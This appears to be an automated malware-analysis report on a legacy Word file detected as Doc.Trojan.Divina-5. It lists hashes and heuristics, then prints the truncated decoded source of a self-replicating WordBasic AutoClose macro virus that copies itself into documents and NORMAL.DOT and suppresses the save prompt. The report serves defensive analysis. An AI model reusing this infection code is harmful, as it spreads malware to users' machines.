Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 67fc396de8bce0dd…

MALICIOUS

Office (OLE)

Size: 34.0 KB
Created: 1998-01-01 00:54:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: a4568189836dac4e7b28da45226ea980
SHA-1: 394cf6a76c39ef6f244bff2ce00465f0b1067598
SHA-256: 67fc396de8bce0ddec09271c015607e8e58963a23382f7565b352ae0b5cb254a
Risk Score: 140

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample is a legacy Word document containing a WordBasic AutoClose macro. This macro is designed to execute automatically when the document is closed, indicating a malicious intent to run arbitrary code. The ClamAV detection 'Doc.Trojan.Divina-5' further supports the malicious nature of the file.

Heuristics (4)

  • ClamAV: Doc.Trojan.Divina-5 (severity: critical; rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Divina-5
  • VBA macros detected (severity: medium; 1 related finding; rule: OLE_VBA_MACROS)
    Document contains VBA macro code
  • Auto_Close macro (severity: high; rule: OLE_VBA_AUTOCLOSE)
    Auto_Close macro
  • Legacy WordBasic auto-exec macro marker (severity: medium; rule: OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename    Kind       Source                                                Size
macros.bas  vba-macro  oletools.olevba.extract_macros (decoded VBA source)   4245 bytes
SHA-256: 1504ce9c1b404fd4016df65f56d254142abf826f11d77099419ca605b20559ec
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "AutoClose"


Public Sub MAIN()

    Infezione

    WordBasic.Call "Effetti"

End Sub



Private Sub Infezione()
Dim fileattuale$
Dim dataeoraatt$
Dim dataeorasalv$
Dim dlg As Object
Dim macrodot$
Dim normaldot$
Dim trovata$
Dim NumeroMacro
Dim i
Dim macro$
Dim libcopia1$
Dim timer_

'** Save as template
'** Does not detect being on a network


'* store the name of the open document in fileattuale
'* continue if the document is new and has no name yet
    fileattuale$ = ""
    On Error Resume Next
    fileattuale$ = WordBasic.[FileName$]()

'* compute date, hour and minute of the last save
    dataeoraatt$ = WordBasic.[Date$]() + " " + WordBasic.[Time$]()
    dataeorasalv$ = ""
    If fileattuale$ <> "" Then
        WordBasic.FileSummaryInfo FileName:=fileattuale$
            Set dlg = WordBasic.DialogRecord.FileSummaryInfo(False)
            WordBasic.CurValues.FileSummaryInfo dlg
        dataeorasalv$ = dlg.LastSavedDate
    End If

'* if the minute of the last save is the current one
'* then exit so as not to enter a loop
'* also exit if the document is new and not yet saved
'* or if it is a file with no save date, such as a txt (which is not overwritten)
    If dataeorasalv$ = dataeoraatt$ Or dataeorasalv$ = "" Then GoTo fine

'* find where the macro is
    macrodot$ = WordBasic.[MacroFileName$]("AutoClose")

'* find the path and disable the prompt to save normal
    normaldot$ = UCase(WordBasic.[DefaultDir$](2) + "\NORMAL.DOT")
    WordBasic.ToolsOptionsSave GlobalDotPrompt:=0

'* check whether there is already an AutoClose in normal
    trovata$ = "false"
    NumeroMacro = WordBasic.CountMacros()
    For i = 1 To NumeroMacro
        macro$ = WordBasic.[MacroName$](i, 0)
        If macro$ = "AutoClose" Then trovata$ = "true"
    Next i

'* copy the macro into fileattuale, saving it as a template, or into normal
'* only one copy must be made or an error occurs (see: libcopia$="true")
    libcopia1$ = "false"
    If fileattuale$ <> "" And fileattuale$ <> normaldot$ And fileattuale$ <> macrodot$ Then
        WordBasic.FileSaveAs Format:=1
        WordBasic.Organizer Copy:=1, Source:=macrodot$, Destination:=fileattuale$, Name:="AutoClose", Tab:=3
        libcopia1$ = "true"
    End If
    If fileattuale$ <> "" And fileattuale$ <> normaldot$ And fileattuale$ = macrodot$ And libcopia1$ = "false" And trovata$ = "false" Then WordBasic.Organizer Copy:=1, Source:=fileattuale$, Destination:=normaldot$, Name:="AutoClose", Tab:=3

'*
' not implemented because it overwrites another AutoClose in filedot
' every so often copies the macro into another template
'   min = Minute(Now())
'   filedot$ = ""
'   If min = 30 Or min = 45 Then filedot$ = Files$(DefaultDir$(2) + "\*.DOT")
'   If fil
    'Next x
    WordBasic.Beep
WordBasic.MsgBox "Questo computer non è ben protetto contro i virus ..." + Chr(10) + "A presto !", "", 48

    WordBasic.ToggleFull
salvataggioRob:
    Err.Number = 0
    On Error GoTo -1: On Error GoTo salvataggioRob
    WordBasic.FileSaveAll 0

    For x = 1 To 2
        For timer_ = 1 To (1000 * x)
        Next timer_
    Next x
    WordBasic.Beep
riprendi:
    Err.Number = 0
    On Err
... (truncated)